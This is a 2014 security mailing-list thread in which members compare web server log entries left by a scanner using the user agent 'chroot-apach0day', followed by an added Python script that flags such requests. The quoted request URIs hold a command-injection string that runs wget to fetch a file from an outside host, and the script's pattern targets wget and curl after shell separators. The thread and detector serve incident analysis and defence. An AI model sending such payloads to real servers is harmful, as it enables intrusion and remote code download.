Would this be a reverse honeypot ? :) I just got a hit also on my sensor:
162.253.66.77 - - [28/Jul/2014:17:54:00 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 8687 "-" "chroot-apach0day"

Oleg.

On Mon, Jul 28, 2014 at 2:38 PM, Eric Buckingham <er...@proxypipe.com> wrote:

> Looks like an attempt by somebody to troll us sadly :/
>
> On Mon, Jul 28, 2014 at 2:18 PM, Jim Halfpenny <jim.halfpe...@gmail.com> wrote:
>
>> It didn't take long to get a pcap of this request, I started httpd on
>> a random VPS of mine and it's the only request I have received so far.
>> At first glance it doesn't seem like anything special.
>>
>> Jim
>>
>> On 28 July 2014 15:54, Robin Wood <robin@digi.ninja> wrote:
>> >
>> > On 28 July 2014 15:30, Frank Michael <frankcmich...@gmail.com> wrote:
>> >>
>> >> Various sources confirming the same thing for other sites. All on 7/28.
>> >> Keep an eye open.
>> >
>> > I've just mailed the SANS ISC about it saying that others had seen it, see
>> > if they come back with anything.
>> >
>> > Robin
>> >
>> >> On Jul 28, 2014, at 5:09 AM, Robin Wood <robin@digi.ninja> wrote:
>> >>
>> >> I've got a site that was scanned this morning by a tool that left these
>> >> entries in the logs:
>> >>
>> >> [HTTP_USER_AGENT] => chroot-apach0day
>> >> [HTTP_REFERRER] => /xA/x0a/x05
>> >> [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day;
>> >>
>> >> Anyone recognise it? That user agent isn't coming up in google searches.
>> >>
>> >> Robin
>> >>
>> >> _______________________________________________
>> >> Pauldotcom mailing list
>> >> Pauldotcom@mail.securityweekly.com
>> >> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
>> >> Main Web Site: http://pauldotcom.com
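A log check for the requests reported in this thread, as an added example that is not part of any poster's message: it parses combined-format access log lines and flags the user agent and the `;wget` pattern quoted above. The `curl` alternative, the extra separator characters and every sample line except the first are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache/nginx "combined" access log format.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
SCAN_UA = "chroot-apach0day"  # user agent reported in the thread
# Shell separator followed by a download command, matched after URL-decoding.
# curl and the separators other than ';' are assumptions, not seen in the thread.
CMD_RE = re.compile(r'[;|&`]\s*(wget|curl)\b', re.IGNORECASE)

def classify(line):
    """Return (source_ip, reasons) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None  # not combined format; ignore rather than guess
    reasons = []
    if SCAN_UA in m["ua"].lower():
        reasons.append("user-agent")
    if CMD_RE.search(unquote(m["request"])):
        reasons.append("command-in-uri")
    return (m["ip"], reasons) if reasons else None

def scan(lines):
    """Group the reasons each source IP was flagged for."""
    hits = defaultdict(set)
    for line in lines:
        result = classify(line)
        if result:
            hits[result[0]].update(result[1])
    return {ip: sorted(reasons) for ip, reasons in hits.items()}

# First entry is the line quoted in the thread; the others are constructed.
SAMPLE = [
    '162.253.66.77 - - [28/Jul/2014:17:54:00 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 8687 "-" "chroot-apach0day"',
    '192.0.2.10 - - [28/Jul/2014:17:55:12 +0000] "GET /search?q=wget+manual HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [28/Jul/2014:18:01:44 +0000] "GET /?a=1%3Bcurl%20example.invalid/x HTTP/1.0" 404 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE).items():
        print(ip, ", ".join(reasons))
```

Matching on the decoded URI as well as the user agent keeps the check useful if the same request shape arrives with a different user agent string.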